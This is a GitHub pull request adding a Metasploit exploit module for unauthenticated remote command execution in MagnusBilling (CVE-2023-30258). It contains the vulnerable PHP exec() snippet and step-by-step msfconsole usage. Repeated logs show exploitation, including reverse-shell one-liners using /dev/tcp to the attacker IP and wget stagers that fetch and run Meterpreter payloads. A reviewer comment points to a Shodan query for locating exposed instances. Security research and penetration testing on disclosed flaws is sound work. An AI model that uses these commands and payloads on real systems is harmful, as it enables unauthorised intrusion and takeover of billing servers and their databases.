Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

MagnusBilling unauthenticated RCE [CVE-2023-30258] #18481

Merged
merged 4 commits into from
Nov 3, 2023
Merged

MagnusBilling unauthenticated RCE [CVE-2023-30258] #18481

merged 4 commits into from
Nov 3, 2023

Conversation

h00die-gr3y
Copy link
Contributor

@h00die-gr3y h00die-gr3y commented Oct 24, 2023
edited
Loading

MagnusBilling is an open source tool written in PHP and JAVASCRIPT, using the EXTJS 6 and YII FRAMEWORK frameworks, aimed at IP telephony providers. It provides a complete and powerful system for anyone to start an IP telephony provider.

Unfortunately a command injection vulnerability exists in MagnusBilling versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server. This is caused by a piece of demonstration code which is present in lib/icepay/icepay.php, with a call to exec() at line 753. The parameter to exec() includes the GET parameter democ, which is controlled by the user.

An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data or asterisk. At a minimum, this allows an attacker to compromise the billing system and its database.

See this attackerkb article for more information.

This module has been tested on:

  • Debian 12.2 running on VirtualBox 7 with MagnusBilling 7 installed.
  • CentOS 7 running on VirtualBox 7 with MagnusBilling 6 installed.

Installation steps

  • Install Debian 11 or later on VirtualBox using these instructions.
  • Login into Debian Linux machine.
  • Switch to root with su - if needed.
  • Follow the install instructions for either MagnusBilling 7 or
    MagnusBilling 6
  • After successful installation, you can test the module with the verification steps listed at the Verification section.

PS: If you have installed MagnusBilling 7, please update the mbilling/lib/icepay/icepay.php file at the web server root (typically /var/www/html) by adding the vulnerable code below.

if (isset($_GET['demo'])) {

    if ($_GET['demo'] == 1) {
        exec("touch idepay_proccess.php");
    } else {
        exec("rm -rf idepay_proccess.php");
    }
}
if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}

Verification

  • Start msfconsole
  • use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
  • set rhosts <ip-target>
  • set rport <port>
  • set lhost <ip-attacker>
  • set target <0=PHP, 1=Unix Command, 2=Linux Dropper>
  • exploit

you should get a shell or Meterpreter session.

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > info

       Name: MagnusBilling application unauthenticated Remote Command Execution.
     Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x64, x86
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-06-26

Provided by:
  h00die-gr3y <[email protected]>
  Eldstal

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting         Required  Description
  ----       ---------------         --------  -----------
  Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                               /using-metasploit.html
  RPORT      80                      yes       The target port (TCP)
  SSL        false                   no        Negotiate SSL/TLS for outgoing connections
  SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /mbilling               yes       The MagnusBilling endpoint URL
  URIPATH                            no        The URI to use for this exploit (default is random)
  VHOST                              no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                      chine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.


  When TARGET is 0:

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left
                                       unset.

Payload information:

Description:
  A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
  remote attackers to run arbitrary commands via unauthenticated HTTP request.
  A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
  The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
  not properly sanitised/escaped.
  After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
  The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
  At a minimum, this allows an attacker to compromise the billing system and its database.

  The following MagnusBilling applications are vulnerable:
  - MagnusBilling application version 6 (all versions);
  - MagnusBilling application up to version 7.x excluding commit 7af21ed620 which fixes this vulnerability;

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-30258
  https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258
  https://eldstal.se/advisories/230327-magnusbilling.html


View the full module info with the info -d command.

Scenarios

MagnusBilling 7 on Debian 12.2 - PHP with payload php/meterpreter/reverse_tcp

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 192.168.201.34
rhosts => 192.168.201.34
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.1 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.34
[+] Deleted LfsCVIttNL.php
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.34:46230) at 2023-10-24 10:26:47 +0000

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64
Meterpreter : php/linux
meterpreter >

MagnusBilling 7 on Debian 12.2 - Unix Command with payload cmd/unix/reverse_bash

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 1
target => 1
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 2.1 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.34:46396) at 2023-10-24 17:09:45 +0000

uname -a
Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64 GNU/Linux
id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
pwd
/var/www/html/mbilling/lib/icepay

MagnusBilling 7 on Debian 12.2 - Linux Dropper with payload linux/x64/meterpreter/reverse_tcp

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 2
target => 2
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.09 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/3X16QTzG27N
[*] Client 192.168.201.34 (Wget/1.21.3) requested /3X16QTzG27N
[*] Sending payload to 192.168.201.34 (Wget/1.21.3)
[*] Sending stage (3045380 bytes) to 192.168.201.34
[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.34:55224) at 2023-10-24 17:12:05 +0000
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.34
OS           : Debian 12.2 (Linux 6.1.0-13-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: asterisk
meterpreter > pwd
/var/www/html/mbilling/lib/icepay
meterpreter >

Limitations

No limitations identified.

jvoisin
jvoisin reviewed Oct 25, 2023
View reviewed changes
modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
],
'DisclosureDate' => '2023-06-26',
'Platform' => ['php', 'unix', 'linux'],
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
'Arch' => [ARCH_PHP, ARCH_CMD],

since this is PHP, it should be pretty much arch-independent, no?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, you are right, however a PHP Meterpreter payload is limited in functionality compared to a Meterpreter payload with Linux Dropper based on X64 or X86 architecture. For that reason I would like to keep it in.

Hope this makes sense.

modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
})
# Check if target is a magnusbilling application
return CheckCode::Unknown('No response received from target.') unless res
return CheckCode::Safe('Likely not a magnusbilling application.') unless res.code == 200 && res.body =~ /MagnusBilling/i
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please make the check a bit less generic, otherwise it'll match on every page containing the string MagnusBilling

Copy link
Contributor Author

@h00die-gr3y h00die-gr3y Oct 25, 2023
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Will have a look to add more specific banner information, but MagnusBilling is already pretty specific.
Just run shodan with dork http.html:"magnusbilling" and you will find all the instances running this application and hardly any/no false positives.

@cdelafuente-r7 cdelafuente-r7 self-assigned this Oct 26, 2023
cdelafuente-r7
cdelafuente-r7 reviewed Oct 27, 2023
View reviewed changes
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @h00die-gr3y for this module. I left a few comments for you to review when you get a chance. Also, I tested against MagnusBilling v7 and confirm it is not vulnerable by default. The vulnerable code has to be added for the module to work, which I believe is not what would happen in a real situation. I also tested version 6 and confirm it is vulnerable. However, I was not able to make the PHP target (target 0) work:

  • target 0 (PHP)
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.06 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[!] This exploit may require manual cleanup of 'pEStRoAQ.php' on the target
[*] Exploit completed, but no session was created.

Whereas other targets work:

  • target 1 (Unix Command)
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[+] bash -c '0<&22-;exec 22<>/dev/tcp/192.168.100.1/4444;sh <&22 >&22 2>&22'
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.06 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.100.1:4444 -> 192.168.100.135:53072) at 2023-10-27 18:06:06 +0200

id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
uname -a
Linux localhost.localdomain 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
  • target 2 (Linux Dropper)
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.1:8080/XrHaLJNAW0lN
[*] Generated command stager: ["wget -qO /tmp/uZvBvSUt http://192.168.100.1:8080/XrHaLJNAW0lN;chmod +x /tmp/uZvBvSUt;/tmp/uZvBvSUt;rm -f /tmp/uZvBvSUt"]
[*] Client 192.168.100.135 (Wget/1.14 (linux-gnu)) requested /XrHaLJNAW0lN
[*] Sending payload to 192.168.100.135 (Wget/1.14 (linux-gnu))
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.135
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.135:53100) at 2023-10-27 18:07:17 +0200
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb Outdated Show resolved Hide resolved
documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md Show resolved Hide resolved
modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb Outdated Show resolved Hide resolved
@h00die-gr3y
Copy link
Contributor Author

h00die-gr3y commented Oct 28, 2023
edited
Loading

Thanks @h00die-gr3y for this module. I left a few comments for you to review when you get a chance. Also, I tested against MagnusBilling v7 and confirm it is not vulnerable by default. The vulnerable code has to be added for the module to work, which I believe is not what would happen in a real situation. I also tested version 6 and confirm it is vulnerable. However, I was not able to make the PHP target (target 0) work:

* target 0 (PHP)

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.06 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[!] This exploit may require manual cleanup of 'pEStRoAQ.php' on the target
[*] Exploit completed, but no session was created.

Whereas other targets work:

* target 1 (Unix Command)

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[+] bash -c '0<&22-;exec 22<>/dev/tcp/192.168.100.1/4444;sh <&22 >&22 2>&22'
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.06 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.100.1:4444 -> 192.168.100.135:53072) at 2023-10-27 18:06:06 +0200

id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
uname -a
Linux localhost.localdomain 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

* target 2 (Linux Dropper)

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.1:8080/XrHaLJNAW0lN
[*] Generated command stager: ["wget -qO /tmp/uZvBvSUt http://192.168.100.1:8080/XrHaLJNAW0lN;chmod +x /tmp/uZvBvSUt;/tmp/uZvBvSUt;rm -f /tmp/uZvBvSUt"]
[*] Client 192.168.100.135 (Wget/1.14 (linux-gnu)) requested /XrHaLJNAW0lN
[*] Sending payload to 192.168.100.135 (Wget/1.14 (linux-gnu))
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.135
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.135:53100) at 2023-10-27 18:07:17 +0200
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Interesting to know that PHP target in v6 does not work. Let me also check with MagnusBilling v6 to understand what is going on.

@cdelafuente-r7 Fixed the issue. In version 6, directory mbilling/lib/icepay is not write-able. To overcome this situation, I have turned on the read, write and execute bit on the directory before writing the webshell.
I have tested this successfully with both MagnusBilling version 6 and 7.

@cdelafuente-r7
Copy link
Contributor

Thanks @h00die-gr3y ! Everything looks good to me now. I tested against both versions (6 and 7 without the patch) and verified I had a session with each target. I'll go ahead and land it. Thank you for your contribution!

Example output

MagnuBilling v6

target 0 (PHP) 
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 8 seconds.
[*] Elapsed time: 8.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.100.135
[+] Deleted LZVojfWJaetche.php
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.135:35052) at 2023-11-03 18:44:00 +0100

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux localhost.localdomain 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
Meterpreter : php/linux
target 1 (Unix Command) 
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[+] bash -c '0<&159-;exec 159<>/dev/tcp/192.168.100.1/4444;sh <&159 >&159 2>&159'
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.06 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 2 opened (192.168.100.1:4444 -> 192.168.100.135:35078) at 2023-11-03 18:45:30 +0100

id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
uname -a
Linux localhost.localdomain 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
target 2 (Linux Dropper) 
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.135 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.135:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 8 seconds.
[*] Elapsed time: 8.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.1:8080/W4k88CJ4TpyI
[*] Generated command stager: ["wget -qO /tmp/qryVAuTM http://192.168.100.1:8080/W4k88CJ4TpyI;chmod +x /tmp/qryVAuTM;/tmp/qryVAuTM;rm -f /tmp/qryVAuTM"]
[*] Client 192.168.100.135 (Wget/1.14 (linux-gnu)) requested /W4k88CJ4TpyI
[*] Sending payload to 192.168.100.135 (Wget/1.14 (linux-gnu))
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.135
[*] Meterpreter session 3 opened (192.168.100.1:4444 -> 192.168.100.135:35106) at 2023-11-03 18:47:42 +0100
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

MagnuBilling v7

target 0 (PHP) 
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.139 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.139:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.08 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.1:8080/GIEc25XETzvDx
[*] Generated command stager: ["wget -qO /tmp/ELZlXeAw http://192.168.100.1:8080/GIEc25XETzvDx;chmod +x /tmp/ELZlXeAw;/tmp/ELZlXeAw;rm -f /tmp/ELZlXeAw"]
[*] Client 192.168.100.139 (Wget/1.21) requested /GIEc25XETzvDx
[*] Sending payload to 192.168.100.139 (Wget/1.21)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.139
[*] Meterpreter session 4 opened (192.168.100.1:4444 -> 192.168.100.139:50858) at 2023-11-03 20:30:42 +0100
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer     : dc01.sambaad.internal
OS           : Debian 11.8 (Linux 5.10.0-26-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
target 1 (Unix Command) 
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.139 lhost=192.168.100.1

[+] bash -c '0<&52-;exec 52<>/dev/tcp/192.168.100.1/4444;sh <&52 >&52 2>&52'
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.139:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 5 opened (192.168.100.1:4444 -> 192.168.100.139:60630) at 2023-11-03 20:31:33 +0100

id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
uname -a
Linux dc01 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64 GNU/Linux
target 2 (Linux Dropper) 
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit verbose=true rhosts=192.168.100.139 lhost=192.168.100.1

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.139:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.1:8080/zpSe49TgC7B2T
[*] Generated command stager: ["wget -qO /tmp/ARPeAODj http://192.168.100.1:8080/zpSe49TgC7B2T;chmod +x /tmp/ARPeAODj;/tmp/ARPeAODj;rm -f /tmp/ARPeAODj"]
[*] Client 192.168.100.139 (Wget/1.21) requested /zpSe49TgC7B2T
[*] Sending payload to 192.168.100.139 (Wget/1.21)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.139
[*] Meterpreter session 6 opened (192.168.100.1:4444 -> 192.168.100.139:54992) at 2023-11-03 20:32:19 +0100
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer     : dc01.sambaad.internal
OS           : Debian 11.8 (Linux 5.10.0-26-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 3, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 1cde619 into rapid7:master Nov 3, 2023
33 checks passed
@cdelafuente-r7
Copy link
Contributor

Release Notes

This adds an exploit module that leverages a command injection vulnerability in MagnusBilling versions 6 and 7. this vulnerability is identified as CVE-2023-30258 and allows unauthenticated remote code execution in the context of the user running the web server process.

@h00die-gr3y h00die-gr3y deleted the magnusbilling-unauth-rce branch November 5, 2023 13:51
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 left review comments

@jvoisin jvoisin jvoisin left review comments

Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@h00die-gr3y @cdelafuente-r7 @jvoisin @jheysel-r7